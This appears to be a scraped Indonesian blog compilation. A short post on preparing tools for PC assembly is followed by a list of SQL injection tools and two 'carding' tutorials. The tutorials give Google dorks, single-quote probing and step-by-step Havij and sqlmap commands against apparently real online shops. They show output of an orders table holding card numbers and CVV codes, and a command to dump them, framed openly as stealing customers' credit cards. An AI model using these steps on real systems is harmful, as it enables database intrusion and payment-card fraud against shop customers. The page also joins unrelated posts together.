0 Persiapan Komponen dan Perlengkapan merakit PC

Persiapan Komponen dan Perlengkapan merakit PC

Komponen komputer beserta perlengkapan untukperakitan dipersiapkan untuk perakitan dipersiapkan lebih dulu untuk memudahkan perakitan. Perlengkapan yang disiapkan terdiri dari: Komponen komputer, Kelengkapan komponen seperti kabel, sekerup, jumper, baut dan sebagainya, Buku manual dan referensi dari komponen, Alat bantu berupa obeng pipih dan philips,Software sistem operasi, device driver dan program aplikasi. Buku manual diperlukan sebagai rujukan untuk mengatahui diagram posisi dari elemen koneksi (konektor, port dan slot) dan elemen konfigurasi (jumper dan switch) beserta cara setting jumper dan switch yang sesuai untuk komputer yang dirakit.Diskette atau CD Software diperlukan untuk menginstall Sistem Operasi, device driver dari piranti, dan program aplikasi pada komputer yang selesai dirakit.

Adapun Peralatan yang dibutuhkan untuk merakit komputer, adalah :

·         Obeng Plus (+)

·         Obeng Minus (-)

·         Tang Lancip (Capit Buaya)

·         Multimeter / Multitester (Untuk pengukuran tegangan)

·         Pinset (Untuk pencabut jumper)

·         Gelang Anti Statik

Sumber : http://ibtimain.blogspot.com/2013/03/persiapan-alat-yang-dibutuhkan-untuk.html

0 KUMPULAN TOOL SQL INJECTION

1.Havij SQL Injection
Havij adalah tool sql injection yang memiliki metode injection yang berbeda dari kebanyakan tool karena itu tingkat kesuksesan dalam melakukan SQL injection dengan havij mencapai 95%. Selain itu juga havij memiliki tampilan GUI yang user friendly sehingga dapat dimengeri bahkan untuk pemula sekalipun.

Download here
2.Pangolin – Automated SQL Injection Test Tool
Pangolin adalah tool untuk melakukan SQL injection pada security database. Tujuanya adalah untuk mendeteksi dan mengambil keuntungan dari celah SQL injection suatu website.

Download Here
3.BSQL Hacker
BSQL (Blind SQL) Hacker adalah SQL Injection Framework / Tool yang di desain untuk melakukan exploit SQL injection vulnerabilities secara virtual.

Download Here
4.Safe3 SQL Injector
Safe3SI juga merupakan tool yang saya anjurkan karena tool ini selain mudah digunakan juga memiliki tingkat keberhasilan yang besar seperi havij.

Download Here
5.The Mole
Meskipun tampilan tool ini kurang user friendly tapi kita bisa menggunakanya juga untuk melakukan SQL Injection.

Download Here
6.SQLNinja SQL injection
Tujuan tool Sqlninja adalah untuk melakukan exploit SQL injection vulnerabilities pada aplikasi web yang digunakan Microsoft SQL Server .

Download Here

0 TUTORIAL CARDING DENGAN HAVIJ

Carding adalah tindak kriminal dengan modus mencuri Credit Card orang lain dari sebuah web OLshop yang vuln (dapat ditembus Database nya).. Carding ini termasuk tindak kejahatan dan para pelakunya dapat dijerat hukum lohh .. masih mau tau Cara Carding Menggunakan Havij Dijamin Bisa ? oke .. langsung aja ..

Bahan – Bahan :
1. Havij 1.16 Pro ( comot DISINI )
2. Dork ( Dork bakalan gue kasih di bawah artikel)
Oke langsung aja caranya :
1. Siapkan Tool Havij 1.16 Pro
2. Lu cari dah Web OLshop yang vuln dengan menggunakan dork yang disediakan
NB: Untuk mencari web OLshop yang vuln, kita tinggal menambahkan tanda ‘ (kutip 1) di belakang URL, Misalkan gue mau cari web vuln dengan dork “inurl:merchandise/index.php?cat=” lu paste aja ntu dork di mbah gugel.. nnti akan banyak web OLshop.. Lu cek satu per satu dengan menambahkan tanda kutip tadi di setiap belakang URLnya..

Nah.. tuh, udah gue tambahin tanda kutip di belakang Urlnya.. jika muncul seperti ini

Berarti Web itu Vuln ..

3. Gue ambil target http://www.pikerpress.com/merchandise/index.php?cat=book 

4. Klik “analyze” .. kalo udah ada tulisan “CurrentDB=” berarti proses analyze sudah selesai.. kalo sudah selesai, Klik kolom “Tables” diatas.. akan muncul gambar seperti ini

5. Ceklis kotaknya, lalu klik “Get Tables”, jika sudah, tampilan nya jadi benini

6. untuk mencari data-data Credit Card, biasanya terdapat pada tables “Users” , “Consumers” atau yang lain nya.. sekarang, kita coba dari tables “Users”.. ceklis kolom kecil disebelah tulisan “Users”, lalu klik “Get Columns” .. maka akan seperti ini

7. Nahh, itu ada informasi ID, Username, Password.. Disini kita apes, gaada Columns CreditCard :’v kalo kalian beruntung, pasti terdapat informasi Creditcard, Paypal, dll.. tapi kita coba dulu ID , Username, Password.. cara mendapatkan data nya, kita ceklis Id, Username, Password, Lalu Klik “Get Data” .. kali ini gue mau liat semuanya, maka yang diceklis adalah (liat gambar dibawah)

8. Kolom yang disebelah kanan Itu adalah kolom untuk menampilkan data-data yang kita inginkan (gue cuma dapet 1 -_- ) .. kalo kita mau lihat semua datanya, klik “Save DATA” dan formatnya adalah HTML.. Gimana cara buka file yang formatnya HTML ? gampang bro.. lu tinggal Klik Kanan >> Open With >> Google Chrome (ini gak harus google chrome juga sih .. pokoknya openwith browser yang yg udah terinstall)

0 TUTORIAL CARDING (WITH CARDING DORK & SQLMAP)

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

• sqli scanner 1
• sqli scanner 2
• sqli scanner 3

Pertama ,ambil dork lalu scan menggunakan sqli scanner :

Setelah itu kita test URL target dengan memberi kan tanda petik di depan “=”

http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat=’268

Nah, web tersebut error saat kita inject ,

Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link –dbs

Disini kita mendapatkan 3 database :

[*] balboast_gkgbu

[*] balboast_gkgcart

[*] information_schema

Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase –tables ( disini saya coba database “balboast_gkgcart” )


nah, saya dapat tables nya :

Database: balboast_gkgcart

[88 tables]

+———————–+

| amanu                 |

| categories            |

| clients               |

| components            |

| config                |

| config_groups         |

| customers             |

| form_data             |

| form_fields           |

| forms                 |

| geo                   |

| groups                |

| item_amanu            |

| item_cat              |

| item_files            |

| item_files_customer   |

| item_options          |

| item_options_linked   |

| item_options_values   |

| item_related          |

| item_thread           |

| item_thread_old       |

| items                 |

| items_addphoto        |

| items_item_files      |

| items_packages        |

| languages             |

| logs                  |

| mailinglist           |

| mailinglist_cat       |

| mailinglist_members   |

| manu                  |

| news                  |

| news_cat              |

| news_news_cat         |

| orders                |

| photos                |

| photos_cat            |

| pic_gallery           |

| ship_prices           |

| ship_zones            |

| sites                 |

| sites_components      |

| thread                |

| thread_gel            |

| thread_items          |

| ups                   |

| ups_packaging         |

| ups_pickup            |

| ups_service           |

| ups_units             |

| users                 |

| users_access          |

| users_groups          |

| users_spu             |

| users_spu_values      |

| zones                 |

+———————–+

[09:47:41] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/balboastitch.com’

Kita pilih di bagian “orders” . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable –columns

 

Maka akan muncul seperti ini :

Table: orders
[18 columns]
+—————–+————-+
| Column          | Type        |
+—————–+————-+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+—————–+————-+

Nah  sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro  
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable –dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number –dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat